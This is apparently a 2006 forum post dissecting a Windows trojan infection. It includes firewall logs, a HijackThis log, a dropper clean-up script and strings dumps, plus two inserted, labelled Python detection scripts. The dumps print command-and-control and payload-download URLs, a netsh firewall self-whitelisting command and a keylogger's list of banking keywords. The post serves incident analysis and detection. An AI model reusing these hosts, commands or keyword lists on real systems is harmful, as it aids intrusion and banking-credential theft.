3/12/2006 10:11:23 AM mm5.exe OUT TCP 205.188.159.217 smtp Disable Mode
3/12/2006 10:11:22 AM mm5.exe OUT TCP 216.148.227.126 smtp Disable Mode
3/12/2006 10:11:22 AM mm5.exe OUT TCP 67.28.113.70 smtp Disable Mode
3/12/2006 10:11:22 AM mm5.exe OUT UDP 192.168.13.2 dns Disable Mode
3/12/2006 10:11:22 AM mm5.exe OUT TCP 65.54.245.40 smtp Disable Mode
3/12/2006 10:11:22 AM mm5.exe OUT TCP 67.28.113.70 smtp Disable Mode
3/12/2006 10:11:22 AM mm5.exe OUT TCP 194.25.134.9 smtp Disable Mode
3/12/2006 10:11:22 AM mm5.exe OUT TCP 202.93.83.236 smtp Disable Mode
3/12/2006 10:11:21 AM mm5.exe OUT TCP 65.54.244.72 smtp Disable Mode
3/12/2006 10:11:21 AM mm5.exe OUT TCP 67.28.113.10 smtp Disable Mode
3/12/2006 10:11:21 AM mm5.exe OUT TCP 209.86.93.228 smtp Disable Mode
3/12/2006 10:11:19 AM mm5.exe OUT TCP 194.25.134.8 smtp Disable Mode
3/12/2006 10:11:18 AM mm5.exe OUT TCP 213.165.64.100 smtp Disable Mode
3/12/2006 10:11:18 AM mm5.exe OUT TCP 62.245.246.226 smtp Disable Mode
3/12/2006 10:11:18 AM mm5.exe OUT UDP 192.168.13.2 dns Disable Mode
3/12/2006 10:11:18 AM mm5.exe OUT UDP 192.168.13.2 dns Disable Mode
3/12/2006 10:11:18 AM mm5.exe OUT TCP 213.165.64.100 smtp Disable Mode
3/12/2006 10:11:18 AM mm5.exe OUT TCP 207.115.57.17 smtp Disable Mode
3/12/2006 10:11:18 AM mm5.exe OUT UDP 192.168.13.2 dns Disable Mode
3/12/2006 10:11:15 AM mm5.exe OUT TCP 217.72.192.149 smtp Disable Mode


lots more where that came from .. let it run for almost 20 hrs

=================== end of transmission - I'd had enough of posting =========================


temp.wsf:

CODE

<job id="delself">
<script language="JScript">
// Dropper clean-up stub: wait a second, then delete the qvxgamet3.exe stage.
// Any error (file already gone, still locked) is swallowed so nothing is ever shown.
try {
    WScript.Sleep(1000);
    fso = new ActiveXObject("Scripting.FileSystemObject");
    var f1 = fso.GetFile("C:/WINDOWS/System32/qvxgamet3.exe");
    f1.Delete();
} catch (e) {}
</script>
</job>



==============
:: Hijack this log ::
==============

Cleaned out most normal programs to just show main hijacks

Logfile of HijackThis v1.99.1
Scan saved at 10:19:57 PM, on 3/12/2006
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe -< was hijacked
C:\WINDOWS\system32\services.exe -< was hijacked
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe -< was hijacked
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE -< was hijacked
C:\Program Files\AlfaCleaner\AlfaCleaner.exe
C:\Program Files\AlfaCleaner\ACServer.exe
C:\WINDOWS\System32\kernels8.exe
C:\WINDOWS\System32\intell321.exe
C:\WINDOWS\System32\kernels8.exe
C:\WINDOWS\System32\vxgamet2.exe
C:\WINDOWS\System32\vxgamet4.exe
C:\WINDOWS\System32\maxd64.exe
C:\Program Files\AlfaCleaner\AlfaCleaner.exe
C:\WINDOWS\System32\vxh8jkdq2.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\maxd64.exe
C:\WINDOWS\System32\maxd64.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\maxd64.exe
C:\WINDOWS\System32\maxd64.exe
C:\WINDOWS\System32\maxd64.exe
C:\WINDOWS\System32\maxd64.exe
C:\WINDOWS\System32\maxd64.exe
C:\WINDOWS\System32\maxd64.exe
C:\WINDOWS\System32\maxd64.exe
C:\WINDOWS\System32\maxd64.exe
C:\WINDOWS\System32\maxd64.exe
C:\WINDOWS\System32\maxd64.exe
C:\WINDOWS\System32\maxd64.exe
C:\WINDOWS\System32\maxd64.exe
C:\WINDOWS\System32\maxd64.exe
C:\WINDOWS\System32\maxd64.exe
C:\WINDOWS\System32\maxd64.exe

R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyServer = 127.0.0.1:7212 <- my proxy settings
R3 - Default URLSearchHook is missing
F3 - REG:win.ini: run=C:\WINDOWS\inet20004\services.exe
O2 - BHO: HBO Class - {5321E378-FFAD-4999-8C62-03CA8155F0B3} - C:\WINDOWS\inet20004\3.02.00.dll
O2 - BHO: IExplorerHelper Class - {E89097ED-3400-411D-9647-D368C3311C98} - C:\WINDOWS\System32\IeHelperExVS.dll
O4 - HKLM\..\Run: [System] C:\WINDOWS\System32\kernels8.exe
O4 - HKLM\..\Run: [sysvx] C:\WINDOWS\sysvx_.exe
O4 - HKLM\..\Run: [SystemLoader] C:\WINDOWS\sysldr32.exe
O4 - HKLM\..\RunServices: [SystemTools] C:\WINDOWS\System32\kernels8.exe
O4 - HKCU\..\Run: [Windows update loader] C:\Windows\xpupdate.exe
O4 - HKCU\..\Run: [WinMedia] "C:\WINDOWS\System32\vxgamet4.exe2560.exe"
O4 - HKCU\..\Run: [xp_system] C:\WINDOWS\inet20004\services.exe
O4 - HKCU\..\Run: [taskdir] C:\WINDOWS\System32\taskdir.exe
O20 - Winlogon Notify: msupdate - C:\WINDOWS\SYSTEM32\msupdate32.dll
O21 - SSODL: DCOM Server - {2C1CD3D7-86AC-4068-93BC-A02304BB8C34} - C:\WINDOWS\System32\dcom_14.dll
O23 - Service: AlfaCleanerService - AlfaCleaner.com - C:\Program Files\AlfaCleaner\ACServer.exe
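The HijackThis entries above are the kind of thing a responder has to triage by eye: the same Windows binary name appearing in two directories, a proxy pointed at localhost, Winlogon Notify and SSODL hooks, a file with two extensions, and one image running many times. The following is an added example (not part of the post, and not code from HijackThis, Regrun or any other tool named here) that parses a HijackThis-style log and flags those patterns. The sample input is a subset of the post's own log; the function names, the `TRUSTED_DIRS` allow-list and the `max_instances` threshold are assumptions of this example, and every tag is a review heuristic, not a verdict.

```python
import re
from collections import Counter

# Constructed sample input: a subset of the HijackThis entries and process list
# quoted in the post above (the paths are the post's own, not invented here).
SAMPLE_LOG = r"""
Running processes:
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\System32\kernels8.exe
C:\WINDOWS\System32\maxd64.exe
C:\WINDOWS\System32\maxd64.exe
C:\WINDOWS\System32\maxd64.exe
C:\WINDOWS\System32\maxd64.exe
C:\WINDOWS\System32\maxd64.exe
C:\WINDOWS\System32\maxd64.exe

R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyServer = 127.0.0.1:7212
F3 - REG:win.ini: run=C:\WINDOWS\inet20004\services.exe
O2 - BHO: HBO Class - {5321E378-FFAD-4999-8C62-03CA8155F0B3} - C:\WINDOWS\inet20004\3.02.00.dll
O4 - HKLM\..\Run: [System] C:\WINDOWS\System32\kernels8.exe
O4 - HKCU\..\Run: [WinMedia] "C:\WINDOWS\System32\vxgamet4.exe2560.exe"
O4 - HKCU\..\Run: [xp_system] C:\WINDOWS\inet20004\services.exe
O20 - Winlogon Notify: msupdate - C:\WINDOWS\SYSTEM32\msupdate32.dll
O21 - SSODL: DCOM Server - {2C1CD3D7-86AC-4068-93BC-A02304BB8C34} - C:\WINDOWS\System32\dcom_14.dll
O23 - Service: AlfaCleanerService - AlfaCleaner.com - C:\Program Files\AlfaCleaner\ACServer.exe
"""

# Where the core XP binaries legitimately live; one of these names loaded from
# anywhere else (e.g. C:\WINDOWS\inet20004\services.exe) is a masquerade.
EXPECTED_DIR = {n: r"c:\windows\system32"
                for n in ("smss.exe", "winlogon.exe", "services.exe", "lsass.exe", "svchost.exe")}
EXPECTED_DIR["explorer.exe"] = r"c:\windows"
# Directories an autostart entry normally points into (assumed allow-list, heuristic).
TRUSTED_DIRS = ("c:\\windows", "c:\\windows\\system32")
TRUSTED_PREFIX = "c:\\program files\\"

ENTRY_RE = re.compile(r"^(?P<code>[A-Z]\d+) - (?P<body>.+)$")
PATH_RE = re.compile(r'[A-Za-z]:\\[^"\r\n]*?\.(?:exe|dll)\b', re.IGNORECASE)
DOUBLE_EXT_RE = re.compile(r"\.(?:exe|dll)[^\\]*\.(?:exe|dll)$", re.IGNORECASE)


def parse_hijackthis(text):
    """Split a HijackThis log into (process list, [(code, body, path-or-None)])."""
    processes, entries, in_procs = [], [], False
    for line in text.splitlines():
        line = line.strip()
        if not line:
            in_procs = False          # a blank line ends the process list
            continue
        if line.lower().startswith("running processes"):
            in_procs = True
            continue
        if in_procs:
            processes.append(line)
            continue
        m = ENTRY_RE.match(line)
        if m:
            p = PATH_RE.search(m.group("body"))
            entries.append((m.group("code"), m.group("body"), p.group(0) if p else None))
    return processes, entries


def split_path(path):
    d, _, name = path.lower().rpartition("\\")
    return d, name


def in_trusted_dir(path):
    d, _ = split_path(path)
    return d in TRUSTED_DIRS or d.startswith(TRUSTED_PREFIX)


def analyse(text, max_instances=5):
    """Return [(tag, detail)] items for review; tags are heuristics, not verdicts."""
    processes, entries = parse_hijackthis(text)
    findings, seen = [], set()
    # 1. A Windows binary name running from, or autostarted from, the wrong directory.
    for path in processes + [p for _, _, p in entries if p]:
        d, name = split_path(path)
        if name in EXPECTED_DIR and d != EXPECTED_DIR[name] and path.lower() not in seen:
            seen.add(path.lower())
            findings.append(("masquerade", path))
    # 2. One image running many times (the post shows maxd64.exe 17 times).
    for image, n in Counter(p.lower() for p in processes).items():
        if n > max_instances:
            findings.append(("process-flood", f"{image} x{n}"))
    # 3. Persistence points and settings worth a look regardless of the path.
    for code, body, path in entries:
        if code == "R1" and "127.0.0.1" in body:
            findings.append(("local-proxy", body))
        elif code == "F3":
            findings.append(("win.ini-run", path or body))
        elif code in ("O20", "O21"):   # Winlogon Notify / ShellServiceObjectDelayLoad
            findings.append(("loader-hook", f"{code} {path}"))
        if path and DOUBLE_EXT_RE.search(path):
            findings.append(("double-extension", path))
        if path and not in_trusted_dir(path):
            findings.append(("odd-dir", f"{code} {path}"))
    return findings


if __name__ == "__main__":
    for tag, detail in analyse(SAMPLE_LOG):
        print(f"{tag:17} {detail}")
```

Run against the sample it reports the inet20004 copy of services.exe once (even though it is referenced by both the F3 and the O4 entry), the maxd64.exe flood, the localhost proxy, both loader hooks, the double-extension WinMedia entry and three autostarts pointing outside the usual directories; the AlfaCleaner service under Program Files is left alone by these rules, which is the point of keeping them narrow.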


==============


netsh.exe launched by c:\windows\system32\kernels8.exe

netsh firewall set allowedprogram "c:\windows\system32\kernels8.exe" enable

Files::
http://www.sophos.com/virusinfo/analyses/trojbdoorik.html


==========

Used regrun vxd file list to dig this one out :

AlfaCleanerService
ProgramFiles\AlphaCleaner\ACServer.exe

hesvc.sys



=============
:: Some files collected ::
=============



sachostx.exe
sachostp.exe
sachostc.exe
sachosts.exe

C:\WINDOWS\inet20004\services.exe
C:\WINDOWS\SYSTEM32\SERVICES.EXE





programfiles\commonfiles\vcclient


alfacleaner
ld.exe
sysldr32.exe
sysvx_.exe
comdlg64.dll
iehelperexvs.dll
maxd64.exe
maxdd.game
nttraf.dat
msdoc.exe
mspostsp.exe
msupdate32.dll
parad.raw.exe
qvxgamet2.exe
qvxgamet4.exe
sysvx.exe
taskdir.exe
vx.tll
vxgame1.exe
vxgame2.exe
vxgame3.exe
vxgame4.exe
vxgame6.exe
vxgamet1.exe
vxgamet2.exe
vxgamet3.exe
vxgamet4.exe
qvxgamet2.exe
qvxgamet4.exe
vxgame4.exe.2560.exe
winsub.xml
zlbw.dll
xpupdate.exe
win32.exe

a few more lying around ..

--------

O2 - BHO: HBO Class - {5321E378-FFAD-4999-8C62-03CA8155F0B3} - C:\WINDOWS\inet20004\3.02.00.dll

--------

IExplorerHelper Class IExplorerHelperVS Module
c:\windows\system32\iehelperexvs.dll

O2 - BHO: IExplorerHelper Class - {E89097ED-3400-411D-9647-D368C3311C98} - C:\WINDOWS\System32\IeHelperExVS.dll

----------

O4 - HKLM\..\RunServices: [SystemTools] C:\WINDOWS\System32\kernels8.exe

----------





HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\msupdate

HKEY_CURRENT_USER\RegSaved\6BB45534C867516E6B1D181C9C18AC30\msupdate

HKEY_USERS\S-1-5-21-1801674531-926492609-839522115-1003\RegSaved\6BB45534C867516E6B1D181C9C18AC30\msupdate

O20 - Winlogon Notify: msupdate - C:\WINDOWS\SYSTEM32\msupdate32.dll



Hooks into winlogon.exe

------

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
O21 - SSODL: DCOM Server - {2C1CD3D7-86AC-4068-93BC-A02304BB8C34} - C:\WINDOWS\System32\dcom_14.dll

------

C:\WINDOWS\System32\OLEEXT.dll

^ Hooked into every program that connects to the internet - was able to unload with Unlocker and delete , also overwrites wininet.dll

--------------
-------

Registry Entries in Run

-----------
All Users:
-----------

WindowsUpdate
C:\WINDOWS\System\svchost.exe /s

AlfaCleaner
C:\Program Files\AlfaCleaner\AlfaCleaner.exe

intell321.exe
C:\WINDOWS\System32\intell321.exe

-------

xp_system
C:\WINDOWS\SYSTEM32\SERVICES.EXE

Worm / Remote Access / IRC trojan / Destructive trojan / DoS tool
Takes mail addresses from HTML files in the Temporary Internet Files folder. It also connects to the password protected IRC channel #xtcdan, is able to send files to it and receive instructions from users on that channel. It is also updated through the Internet. The mail and the attached file claim to be coming from the antivirus company AVX. It may also destroy files on the infected computer.




--------

sachost
C:\WINDOWS\sachostx.exe

http://www.symantec.com/avcenter/venc/data...oksky.e@mm.html

SystemLoader
C:\WINDOWS\sysldr32.exe

sysvx
C:\WINDOWS\sysvx_.exe

System
C:\WINDOWS\System32\kernels8.exe




------

Current user :

-------

xp_system
C:\WINDOWS\SYSTEM32\SERVICES.EXE

--------

WinMedia
"C:\WINDOWS\System32\vxgamet4.exe2560.exe"

--------

Windows update loader
C:\Windows\XPUpdate.exe




==============

This is the controller :

C:\WINDOWS\System32\taskdir.exe

Windows update Service
Provide Windows update
http ://216.255.179.235/new/cntr/bin/lat.raw
http ://216.255.179.235/new/cntr/ab.php|
http ://216.255.179.235/new/cls/main.php

http ://69.50.171.172/n/ab.php|
http ://69.50.161.106/n/ab.php|
http ://69.50.184.194/n/ab.php

69.50.173.166

RegisterServiceProcess
Kernel32.dll
Software\Microsoft\Windows\CurrentVersion\RunServices
Software\Microsoft\Windows\CurrentVersion\Run
taskdir.dll
CMD.EXE
update
download

============================


3.02.00.dll


HKCR
Replace.HBO.1 = s 'HBO Class'
CLSID = s '{5321E378-FFAD-4999-8C62-03CA8155F0B3}'
Replace.HBO = s 'HBO Class'
CLSID = s '{5321E378-FFAD-4999-8C62-03CA8155F0B3}'
CurVer = s 'Replace.HBO.1'
NoRemove CLSID
ForceRemove {5321E378-FFAD-4999-8C62-03CA8155F0B3} = s 'HBO Class'
ProgID = s 'Replace.HBO.1'
VersionIndependentProgID = s 'Replace.HBO'
ForceRemove 'Programmable'
InprocServer32 = s '%MODULE%'
val ThreadingModel = s 'Apartment'
'TypeLib' = s '{516A36EA-AFE2-4965-A492-B198B7F7B018}'
HKLM
SOFTWARE
Microsoft
Windows
CurrentVersion
Explorer
'Browser Helper Objects'
ForceRemove {5321E378-FFAD-4999-8C62-03CA8155F0B3} = s 'BHO Class'
MSFT
stdole2.tlbWWW
3dREPLACELibWW

dmx38.tmp

InternalName
sachostc.exe
LegalCopyright
Microsoft Corporation. All rights reserved.
LegalTrademarks
OriginalFilename
sachostc.exe
PrivateBuild
ProductName
Microsoft
Windows
Operating System
ProductVersion
SpecialBuild


FileVersion
InternalName
sachostp.exe
LegalCopyright
Microsoft Corporation. All rights reserved.
LegalTrademarks
OriginalFilename
sachostp.exe
PrivateBuild
wininet.dll
InternetGetConnectedState


explorer.exe
sachostc
sachosts
sachostw
sachostm


sachostm.exe
\msvcrl.dll
hook_kbd
un_hook_kbd
hide_get
un_hide_get
sachost.ini
\sachostc.exe
http ://proxy4u.ws:8080/update2.htm
http ://proxy4u.ws:8080/download2.exe
proxy4u.ws
http ://usproxy2u.ws:8080/update2.htm
http ://usproxy2u.ws:8080/download2.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
sachost
http ://%s/index.php?IP=%u.%u.%u.%u&Port1=%d&Port2=%d&ID=%x&Ver=%s&con=%s&speed=%d
netsh firewall set allowedprogram "%s" enable

NtQuerySystemInformation
QRh
uWh
NtEnumerateValueKey
uWh
NtQueryDirectoryFile
PPh
RhD
%02d.%02d.%04d %02d:%02d:%02d #0x0d#0x0a
[ENT][BKSP][SPACE][TAB][PGUP][PGDN][END][HOME][INS][DEL][UP][DOWN][RIGHT][LEFT]
\attrib.ini
---[ logs
wininet.dll
InternetReadFile
HttpOpenRequestA
HttpSendRequestA
Referer:
abbey
bank
barclay
cahoot
egg
e-gold
forex
halifax
hsbc
ktb
lloyds
log
mail
money
nationet
nationwide
natwest
nwolb
openplan
passport
password
PayPal
rbs
secret
secure
sell
sign
woolwich


GetSystemTime
GetSystemDirectoryA
GetModuleHandleA
LoadLibraryA
GetProcAddress
VirtualProtect
CloseHandle
GetWindowTextA
GetForegroundWindow
SetWindowsHookExA
wsprintfA
UnhookWindowsHookEx
CallNextHookEx
StrStrIW
strstr
msvcrl.dll
hook_kbd
un_hook_kbd
hide_get
un_hide_get

http ://proxy4u.ws/index.php?IP=192.168.13.132&Port1=0&Port2=0&ID=4fc0805e&Ver=0050&con=&speed=1
C:\WINDOWS\System32\sachosts.exe 17048
\att
rib.f
PPh
\hard.lck
C:\WINDOWS\System32\sachosts.exe
C:\WINDOWS\System32\hard.lck
C:\WINDOWS\System32
C:\Documents and Settings\spywarekiller\Desktop
http ://proxy4u.ws/index.php?IP=192.168.13.132&Port1=0&Port2=0&ID=4fc0805e&Ver=0050&con=&speed=1
C:\WINDOWS\TEMP\dmx38.tmp
netsh firewall set allowedprogram "C:\WINDOWS\System32\sachosts.exe" enable
fff3f


sachostx.exe was pretty much the same as above :


urlmon.dll
URLDownloadToFileA
WVj
svchost.exe
http ://proxy4u.ws/index.php?IP=192.168.13....50&con=&speed=0
C:\WINDOWS\System32\sachosts.exe 27572
\att
rib.f
PPh
\hard.lck
C:\WINDOWS\System32\sachosts.exe
C:\WINDOWS\System32\hard.lck
C:\WINDOWS\System32
C:\Documents and Settings\spywarekiller
http ://proxy4u.ws/index.php?IP=192.168.13....50&con=&speed=0
C:\WINDOWS\sachostx.exe
netsh firewall set allowedprogram "C:\WINDOWS\System32\sachosts.exe" enable
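Two of the strings recovered above are directly usable for detection: the check-in format string `http://%s/index.php?IP=%u.%u.%u.%u&Port1=%d&Port2=%d&ID=%x&Ver=%s&con=%s&speed=%d` (with the real instance for proxy4u.ws), and the `netsh firewall set allowedprogram "..." enable` command that both kernels8.exe and sachostx.exe run to open the Windows Firewall for their own payload. The following is an added example (not from the post and not from any of the tools it names) that matches both: the beacon shape in proxy logs and the firewall-exception command in process-creation events. The log lines and events are constructed here; the first URL and the two netsh command lines are the post's own, while example.com, SomeGame and the timestamps are made up, and the "system-dir" tag is an assumed heuristic.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Check-in hosts and query layout taken from the strings dump in the post.
KNOWN_HOSTS = {"proxy4u.ws", "usproxy2u.ws"}
BEACON_KEYS = ["IP", "Port1", "Port2", "ID", "Ver", "con", "speed"]

# Constructed proxy log lines ("date time client method url"); the first URL is
# the one the post recovered from sachosts.exe, the other two are made up here.
SAMPLE_PROXY_LOG = [
    "2006-03-13 12:00:01 192.168.13.132 GET http://proxy4u.ws/index.php?IP=192.168.13.132&Port1=0&Port2=0&ID=4fc0805e&Ver=0050&con=&speed=1",
    "2006-03-13 12:00:05 192.168.13.132 GET http://www.example.com/index.php?page=1",
    "2006-03-13 12:00:09 192.168.13.140 GET http://usproxy2u.ws:8080/update2.htm",
]

# Constructed process-creation events modelled on the two netsh launches in the
# post (kernels8.exe and sachostx.exe); the last two are benign fillers.
SAMPLE_EVENTS = [
    {"parent": r"c:\windows\system32\kernels8.exe",
     "cmdline": r'netsh firewall set allowedprogram "c:\windows\system32\kernels8.exe" enable'},
    {"parent": r"C:\WINDOWS\sachostx.exe",
     "cmdline": r'netsh firewall set allowedprogram "C:\WINDOWS\System32\sachosts.exe" enable'},
    {"parent": r"C:\Program Files\SomeGame\setup.exe",
     "cmdline": r"netsh firewall set allowedprogram 'C:\Program Files\SomeGame\game.exe' enable"},
    {"parent": r"C:\WINDOWS\explorer.exe", "cmdline": "ipconfig /all"},
]

LOG_RE = re.compile(r"^(\S+ \S+) (\S+) (GET|POST) (\S+)")
# The dump shows both "%s" and '%s' around the program path, so accept either quote.
NETSH_RE = re.compile(r"""netsh\s+firewall\s+set\s+allowedprogram\s+["']?([^"']+?)["']?\s+enable""", re.I)


def classify_url(url):
    """Return the beacon fields if `url` has the index.php check-in shape, else None."""
    parts = urlsplit(url)
    if not parts.path.endswith("/index.php"):
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)   # con= is normally empty
    if list(qs) != BEACON_KEYS:                          # same keys, same order
        return None
    ip = qs["IP"][0]
    if not re.fullmatch(r"\d{1,3}(?:\.\d{1,3}){3}", ip):
        return None
    return {"host": parts.hostname, "ip": ip, "id": qs["ID"][0],
            "ver": qs["Ver"][0], "speed": qs["speed"][0]}


def scan_proxy_log(lines):
    """One record per suspicious request: a full beacon, or any contact with a known host."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        _ts, client, _method, url = m.groups()
        beacon = classify_url(url)
        host = urlsplit(url).hostname
        if beacon:
            hits.append({"kind": "beacon", "client": client, **beacon})
        elif host in KNOWN_HOSTS:
            hits.append({"kind": "known-host", "client": client, "host": host})
    return hits


def scan_process_events(events):
    """Flag netsh firewall exceptions; tag self-whitelisting and Windows-dir programs."""
    findings = []
    for ev in events:
        m = NETSH_RE.search(ev["cmdline"])
        if not m:
            continue
        program, parent = m.group(1).strip(), ev["parent"]
        tags = ["firewall-exception"]
        if program.lower() == parent.lower():
            tags.append("self-whitelist")   # the process opened the firewall for itself
        if program.lower().startswith("c:\\windows\\"):
            tags.append("system-dir")       # heuristic: installers rarely whitelist here
        findings.append({"program": program, "parent": parent, "tags": tags})
    return findings


if __name__ == "__main__":
    for h in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(h)
    for f in scan_process_events(SAMPLE_EVENTS):
        print(f)
```

Matching the beacon on the ordered key set rather than on the host name is what makes the first rule survive a change of check-in domain (the dump already lists two), while the plain host match still catches the update2.htm and download2.exe fetches that carry no query string. The ID and Ver fields are worth keeping in the alert: the ID is a per-host value and Ver a build number, so both help group infections when several machines report in.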

=========

slx.exet

----------------

http ://game4all.biz/adv/soft1/tool.exe
C:\WINDOWS\System32\vx.tll
http ://game4all.biz/adv/soft1/search.exe
C:\WINDOWS\System32\vxh8jkdq1.exe
C:\WINDOWS\System32\vxh8jkdq2.exe
http ://game4all.biz/adv/soft1/tibs.exe
C:\WINDOWS\System32\vxh8jkdq7.exe
C:\WINDOWS\TEMP\
http ://game4all.biz/adv/soft1/proxy.exe
http ://game4all.biz/adv/083/adload.php?a1=United States&a2=Type of Processor: PENTIUM PRO or PENTIUM II/III&a3=Windows version is 5.1&a4=Build: 2600, Platform ID: 2&a5=notoutpost&table=adv83
C:\WINDOWS\System32\vxh8jkdq6.exe
C:\WINDOWS\System32
http ://game4all.biz/adv83.php?adv=83&code1=HOQ0&code2=1208
http ://game4all.biz/adv/soft1/winlogon.exe
C:\WINDOWS\System32\vxh8jkdq5.exe
%s\vx.tll
%s%s%s0%u%s?a1=%s&a2=%s&a3=%s&a4=%s&a5=%s&table=adv%u
%s%s/adv%u.php%s
%s%s%s%stibs.exe
%s%s%s%swinlogon.exe
%s%s%s%ssearch.exe
%s%s%s%sproxy.exe
%s%s%s%stool.exe
%s%s%s%snull.exe
Ukraine
Russia
%s&code2=%c%c%c%c
?adv=%u&code1=%c%c%c%c
soft1/kl/
soft1/
0bempbe/qiq
0bevojr/qiq
0bew0
hbnf5bmm/cj{
iuuq;00
notoutpost
outpost.exe
PENTIUM PRO or PENTIUM II/III
PENTIUM
Type of Processor: %s
Build: %d, Platform ID: %ld
Windows version is %d.%d
netsh firewall set allowedprogram '%s' enable
counter
%s\3.qtdfmp
%s\7.qtdfmp
%s\6.qtdfmp
%s\5.qtdfmp
%s\2.qtdfmp
%s\1.qtdfmp
%s\4.qtdfmp
kernels8.exe
%s\vxh8jkdq7.exe
%s\vxh8jkdq6.exe
%s\vxh8jkdq5.exe
%s\vxh8jkdq2.exe
%s\vxh8jkdq1.exe
DisableTaskMgr
Software\Microsoft\Windows\CurrentVersion\Policies\System
SystemTools
SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
System
Software\Microsoft\Windows\CurrentVersion\Run
%s\kernels8.exe
InternetCloseHandle
InternetReadFile
HttpQueryInfoA
InternetOpenUrlA
InternetOpenA
WININET.DLL

AlfaCleaner uninstalled from Add/Remove Programs , also had BraveSentry in Program Files but it was damaged and not operational..

============
-------
---------
-------
Moore
Process explorer mem/string dump of :

"C:\WINDOWS\System32\dllcache\IExplore.exe"


CODE
2243 3A5C 5749 4E44 4F57 535C 5379 7374        "C:\WINDOWS\Syst
656D 3332 5C64 6C6C 6361 6368 655C 4945        em32\dllcache\IE
7870 6C6F 7265 2E65 7865 2220 6874 7470        xplore.exe" http
3A2F 2F77 7777 2E6D 6178 7973 6561 7263        ://www.maxysearc
682E 696E 666F 2F67 6F6F 676C 652F 7265        h.info/google/re
6469 7232 2E66 6367 693F 7365 7800 0000        dir2.fcgi?sex...


CODE
0000 0000 E04F D020 EA3A 6910 A2D8 0800        .....O. .:i.....
2B30 309D 1900 2F43 3A5C 0000 0000 0000        +00.../C:\......
0000 0000 0000 0000 0000 0000 005C 0031        .............\.1
0000 0000 0071 3508 B310 2044 4F43 554D        .....q5... DOCUM
457E 3100 0044 0003 0004 00EF BE39 3393        E~1..D.......93.
BA6C 347A 6914 0000 0044 006F 0063 0075        .l4zi....D.o.c.u
006D 0065 006E 0074 0073 0020 0061 006E        .m.e.n.t.s. .a.n
0064 0020 0053 0065 0074 0074 0069 006E        .d. .S.e.t.t.i.n
0067 0073 0000 0018 004A 0031 0000 0000        .g.s.....J.1....
006C 3493 6610 2053 5059 5741 527E 3100        .l4.f. SPYWAR~1.
0032 0003 0004 00EF BE3A 33F9 346C 34A6        .2.......:3.4l4.
6614 0000 0073 0070 0079 0077 0061 0072        f....s.p.y.w.a.r
0065 006B 0069 006C 006C 0065 0072 0000        .e.k.i.l.l.e.r..
0018 004C 0031 0000 0000 0039 33A3 BA12        ...L.1.....93...
004C 4F43 414C 537E 3100 0034 0003 0004        .LOCALS~1..4....
00EF BE3A 33F9 346C 34F6 6414 0000 004C        ...:3.4l4.d....L
006F 0063 0061 006C 0020 0053 0065 0074        .o.c.a.l. .S.e.t
0074 0069 006E 0067 0073 0000 0018 0056        .t.i.n.g.s.....V
00B1 0000 0000 003A 3302 3514 0048 6973        .......:3.5..His
746F 7279 0026 0003 0004 00EF BE3A 33F9        tory.&.......:3.
346C 340E 6714 0000 0048 0069 0073 0074        4l4.g....H.i.s.t
006F 0072 0079 0000 0016 001A 0000 0003        .o.r.y..........
00EF BE60 3539 FFA7 C2CF 11BF F444 4553        ...`59.......DES
5400 0016 0036 0064 634D 0053 0048 0069        T....6.dcM.S.H.i
0073 0074 0030 0031 0032 0030 0030 0036        .s.t.0.1.2.0.0.6
0030 0033 0031 0032 0032 0030 0030 0036        .0.3.1.2.2.0.0.6
0030 0033 0031 0033 0000 001A 0065 6361        .0.3.1.3.....eca
0073 0064 0062 0069 007A 002E 0062 0069        .s.d.b.i.z...b.i
007A 0000 00C6 0068 6328 0001 0000 0000        .z.....hc(......
0080 975E CC96 45C6 0100 4B88 DBD9 45C6        ...^..E...K...E.
0102 0000 0000 0000 0000 0000 003A 0032        .............:.2
0030 0030 0036 0030 0033 0031 0032 0032        .0.0.6.0.3.1.2.2
0030 0030 0036 0030 0033 0031 0033 003A        .0.0.6.0.3.1.3.:
0020 0073 0070 0079 0077 0061 0072 0065        . .s.p.y.w.a.r.e
006B 0069 006C 006C 0065 0072 0040 0068        .k.i.l.l.e.r.@.h
0074 0074 0070 003A 002F 002F 0061 0073        .t.t.p.:././.a.s
0064 0062 0069 007A 002E 0062 0069 007A        .d.b.i.z...b.i.z
002F 0064 006F 006F 0072 0077 0061 0079        ./.d.o.o.r.w.a.y
002F 0064 006F 006F 0072 0077 0061 0079        ./.d.o.o.r.w.a.y
002E 0070 0068 0070 003F 0071 003D 0074        ...p.h.p.?.q.=.t
0069 0074 0073 0000 0000 0000 0000 0000        .i.t.s..........
1700 5300 0001 0800                   ..S.....




CODE
1802 1500 1802 1500 0000 0000 0000 0000        ................
0000 0000 0000 0000 0000 0000 0000 0000        ................
0F00 0500 0000 0E00 6866 2000 B046 1A00        ........hf ..F..
3A00 2F00 2F00 7700 7700 7700 2E00 7A00        :././.w.w.w...z.
3000 7200 6400 6500 7200 2E00 6300 6F00        0.r.d.e.r...c.o.
6D00 2F00 7300 7300 6F00 6600 7400 2F00        m./.s.s.o.f.t./.
6400 6F00 6F00 7200 7700 6100 7900 2E00        d.o.o.r.w.a.y...
7000 6800 7000 3F00 7100 3D00 D100 E500        p.h.p.?.q.=.....
F000 F200 E800 F400 E800 EA00 E000 F200        ................
0000 6900 6E00 7300 0500 1400 0001 0800        ..i.n.s.........
0000 0000 30DB 8602 D843 2200 78DA 3B03        ....0....C".x.;.
0000 0000 0000 0000 0000 0000 0000 0000        ................
